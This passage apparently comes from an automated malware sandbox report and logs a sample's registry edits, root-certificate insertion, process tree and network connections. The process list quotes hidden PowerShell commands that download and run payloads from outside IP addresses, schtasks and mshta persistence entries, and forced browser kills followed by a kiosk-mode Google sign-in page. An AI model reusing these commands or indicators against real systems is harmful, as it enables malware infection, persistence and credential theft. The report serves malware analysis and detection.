| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
"C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
"C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE
"C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "KuBZrmaKyUJ" /tr "mshta \"C:\Temp\VNx3gTICP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\VNx3gTICP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe
"C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1020
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe
"C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe"
C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe
"C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {39E3C316-04D7-43F7-8E3A-F5C9C00AD883} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
C:\ProgramData\rbkvgg\bdhx.exe
C:\ProgramData\rbkvgg\bdhx.exe
C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe
"C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1204
C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe
"C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe"
C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe
"C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.0.1404389395\1587828078" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b681ec8d-5d35-487d-8b3e-c7bb73e798bb} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1352 101d8c58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.1.1074487475\2015986347" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8f1d330-493f-4204-865d-da67d0e22595} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1544 eeeb258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.2.122218642\1120858895" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a181cd1-bc5b-461d-b6bb-1934de5fb0e0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2000 19f72158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.3.258885724\1036051148" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0887fe63-5db0-427d-9249-418af38093f7} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2768 1b31bd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.4.783715881\1406145648" -childID 3 -isForBrowser -prefsHandle 3868 -prefMapHandle 3864 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {157a3b0f-d809-4fad-9176-d73dc0da1f4d} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3880 207da558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.5.1641785714\443642166" -childID 4 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753f3ee8-a3e6-4ddb-8e77-4a5ec56d69a5} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3976 207dba58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.6.300588055\2014769721" -childID 5 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78747322-58cb-47c8-ae37-fd689bb247b0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 4180 1f641a58 tab
C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe
"C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 500
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.80.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.96.1:443 | croprojegies.run | tcp |
| RU | 176.113.115.7:80 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| N/A | 127.0.0.1:49692 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.204.78:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 216.58.204.78:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| N/A | 127.0.0.1:49699 | tcp | |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4086 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
